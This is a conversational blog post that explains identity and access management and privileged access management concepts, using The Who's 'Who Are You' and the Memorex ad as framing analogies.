The Who in 1978 released the rock classic “Who Are You.” The song ironically stands as one of the best songs the band ever released, and has a fundamental meaning in today’s next generation economy: who are you?
We try to solve that problem with technology and Identity and Access Management solutions today, and attempt to verify an identity, account, and context to who you really are.
Even with bad puns aside, who are you was a challenge before modern information technology, and we still wrestle with positive identification today, even though the moral of the song was more about your personality and soul than authentication into a resource. However, if we step back for a moment, we are still asking the same fundamental question: who are you?
Are you who I think you are, and are you whom you claim to be? Not so far-fetched if you are a threat actor with malicious intent or a person living a life of hypocrisy and lies. Right?
My point is that we have been dealing with identity crises long before modern authentication techniques, and even a person from the 70s might have been a different person on the outside than on the inside and their actual intent. Fortunately, we will never hear a song called Identity and Access Management, but it does make for a good blog, so please read on.
Identity and Access Management is the ability to take a human person, a carbon-based life form, and have a one-to-one relationship of person to identity. This is who you are.
Every identity, however, can have multiple aliases representing the identity (deviations like a nickname) and multiple accounts that represent their credentials used for authentication. Therefore, you can have one and only one identity, and multiple accounts with multiple instantiations representing you.
Next, you have your access.
Each account can have different access controls per resource and per context. That means that an account can have access to an asset or application, but another account associated with the same identity does not. This is typically referred to as privileged access management, and is a subset of identity and access management, as defined by leading analysts.
Finally, there is context.
Either of those accounts may work from one geolocation, time and date, resource, etc., but not another. This places access restrictions on the resource based on everything from the source of the request to the risk of connection and initiating device.
Network Access Control, Virtual Private Networks, Access Control Lists, and Multifactor Authentication are typically used to help provide context for access decisions. In all, they help provide the backbone of who you claim to be is actually who you say you are. Get it?
If not, think of the old Memorex tape commercial. The key line was, “Is it live, or is it Memorex?” It questioned whether the audio was actually a live person or a recording.
Using context to help verify access is the same thing. Was that a bot, malware, or a real person I trust from a trusted computer, and at a trusted time? Hopefully, that helps and I did not date myself too badly— which is actually an entirely different problem for identity and access management, stale accounts.
So how does identity and access management translate to businesses today? I am glad you asked.
It is the procedural and policy-driven implementation of technology and workflow to manage the “who” aspect of your identities and accounts. It allows you to automate the creation of an identity, their associated technology accounts (credentials), and define all aspects of access policy to assets, applications, and other information technology resources.
At any given time, you can query an identity and access management solution who has access to what an identity actually have assigned as access. This is key for regulatory compliance auditing.
The problem with the “who,” in this context, is what the identity and accounts actually did with their access permissions.
This is where privileged access management also comes in. It provides the session recording, keystroke logging, application monitoring, and command line filtering to document what the identity and account actually did with a resource. This then allows you to answer if the actions were appropriate.
It also takes us back to our song. Identity and access management tells you who you are and what you can do. Privileged access management answers the deeper question of what you really did and if your intentions where honest, truthful, and not malicious.
So the next time you hear The Who, or think about Identity and Access Management, remember this relationship. It can tell you who you are, but to really know your intentions, you need to dig deeper and monitor their activity as well.
No identity or account should ever be taken at face value without context and the ability to actually audit and monitor its behavior to see if they are who they say they are and their intentions are honorable.
